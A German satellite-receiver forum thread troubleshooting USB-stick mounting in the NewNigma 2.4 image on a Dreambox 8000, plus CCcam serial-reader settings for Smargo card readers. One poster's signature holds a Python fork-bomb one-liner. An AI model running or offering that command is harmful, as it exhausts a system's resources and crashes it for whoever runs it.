NewNigma 2.4 & USB-Stick

• NewNigma 2.4 & USB-Stick

Hi @ all !!!

Habe erneut folgendes Problem mit dem aktuellen NewNigma 2.4 - Image und meinem 8GB USB-Stick.

Habe meine ganzen LCD - Skins und meine SWAP - Datei auf diesem USB-Stick, welcher hinten, im oberen USB - Slot meiner Dreambox 8000 steckt.

Am hinten, unteren USB - Slot meiner Dreambox 8000 habe ich einen aktiven USB - Hub, indem Smargo - Readers stecken.

Des Weiteren habe ich intern per S-ATA auch eine WD 1 Terrabyte Festpaltte und einen Slimline DVD - Brenner eingebaut.

Alles funktioniert auch einwandfrei nur eben der blöde USB - Stick nicht so wie er soll.

Ich hatte es mal geschafft, dass dieser funktioniert, doch sobald ich meine Dreambox 8000 komplett neustarte bzw. komplett auschalte und wieder einschalte, ist mein USB-Stick nicht mehr gemountet.

Habe ihn auch schon mehrmals per USB - Manager ins fstab eingetragen.

Also er wird einfach nicht mehr gemountet egal was ich auch mit dem USB - Manger versuche.

Irgendwie klappte alles mit dem alten USB - Manager meiner Meinung nach besser.

Also habe ich erneut den USB-Stick aus meiner Dreambox 8000 raus gezogen und diesen erneut am PC formatiert in FAT32. Danach wieder eingesteckt, jetzt kommt immer wenn ich ihn versuche einzuhängen, bzw. eine SWAP - Datei anzugelen oder wenn ich versuche LCD-Skins zu installieren eine grüner Bildschirm und somit stürzt die Box ab und macht einen Neustart.

Bin echt am verzweifeln...

Wäre echt super wenn ihr diesen bug oder ähnliches beheben könntet und mir auch weiterhelfen könntet.

mfg,
      KLPsAUGER
      Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)

• RE: NewNigma 2.4 & USB-Stick

poste mal die crash-logs von /media/hdd
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Hier mal meine Crashlogs als *.zip angehängt.

mfg,
      KLPsAUGER
      Dateien
      • Crashlogs.zip

(26,18 kB, 478 mal heruntergeladen, zuletzt: )
      Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)

• Lade diese datei lege sie nach /tmp auf der 8000er und installier es mit dem installer.Hier

PS
      Solche aussagen "Irgendwie klappte alles mit dem alten USB - Manager meiner Meinung nach besser."sind nicht angebracht
      weil der nur ein usb gerät unterstüzt hatte der hier verlangt halt ein bischen mehr übung
      weil er in der lage ist 20 und mehr geräte zu verwalten dementsprechend sollte man auch net mit dem hammer drauf rumklopfen und wild die sticks raus und reinkloppen.
      Wenn du das 2.4 sauber flasht und die oben angehängte datei danach installierst sollte es keine probleme geben.
      Aber grundsätzlich immer mit ruhe an die sache gehen es gibt immer eine lösung.
      Die Datei oben ist ein fix für den fstab mount beim booten. :D
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      Lade diese datei lege sie nach /tmp auf der 8000er und installier es mit dem installer.Hier

PS
      Solche aussagen "Irgendwie klappte alles mit dem alten USB - Manager meiner Meinung nach besser."sind nicht angebracht
      weil der nur ein usb gerät unterstüzt hatte der hier verlangt halt ein bischen mehr übung
      weil er in der lage ist 20 und mehr geräte zu verwalten dementsprechend sollte man auch net mit dem hammer drauf rumklopfen und wild die sticks raus und reinkloppen.
      Wenn du das 2.4 sauber flasht und die oben angehängte datei danach installierst sollte es keine probleme geben.
      Aber grundsätzlich immer mit ruhe an die sache gehen es gibt immer eine lösung.
      Die Datei oben ist ein fix für den fstab mount beim booten. :D

Dann mal vielen Dank für den "fix".

Mal gespannt wenn ich die Tage mal neustarten muss...werde dann berichten.

mfg,
      KLPsAUGER

• Original von kati910
      Lade diese datei lege sie nach /tmp auf der 8000er und installier es mit dem installer.Hier

muss man das in jedem fall installieren, wenn man einen SMARGO an einem der 3 USB steckplätze betreiben will?

ich kämpfe nämlich auch erfolglus den smartcardreader im newnigma 2.4 (im flash) mit ccam 2.0.11 zum laufen zu bringen, aber bevor ich das unnötig ins image installiere wollte ich fragen.

egal an welchen usb port ccam meldet mir immer nur:

card reader /dev/tts/0
      no or unknown card inserted

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von xyladecor ()

• Original von xyladecor
      Original von kati910

muss man das in jedem fall installieren, wenn man einen SMARGO an einem der 3 USB steckplätze betreiben will?

ich kämpfe nämlich auch erfolglus den smartcardreader im newnigma 2.4 (im flash) mit ccam 2.0.11 zum laufen zu bringen, aber bevor ich das unnötig ins image installiere wollte ich fragen.

egal an welchen usb port ccam meldet mir immer nur:

card reader /dev/tts/0
      no or unknown card inserted

Welchen Eintrag haste denn in deine CCcam eingefügt für deinen Smargo?

Ich habe bei mir folgendes in die CCcam für die Smargos eingefügt:

SERIAL READER : /dev/usb/tts/0 smartreader+
      SERIAL READER : /dev/usb/tts/1 smartreader+
      SERIAL READER : /dev/usb/tts/2 smartreader+
      SERIAL READER : /dev/usb/tts/3 smartreader+
      SERIAL READER : /dev/usb/tts/4 smartreader+
      SERIAL READER : /dev/usb/tts/5 smartreader+
      SERIAL READER : /dev/usb/tts/6 smartreader+

Wobei jede Zeile für einen Smargo gedacht ist.

Des Weiteren hast du deinen Smargo auch auf Dreambox umgestellt mit dem gleinen Windows - Tool?

mfg,
      KLPsAUGER

• mann, mann, mann, manchmal sieht man echt den wald vor bäumen nicht, ich danke für den hinweis, mit dem ccam.cfg eintrag von mir kanns natürlich nie klappen, hab das nun abgeändert auf "/dev/usb/tts/0" und damit läuft das auch nach emuneustart und die karte im smargo wird gelesen.

VIELEN DANK fürs an der handnehmen und drauf hindeuten =)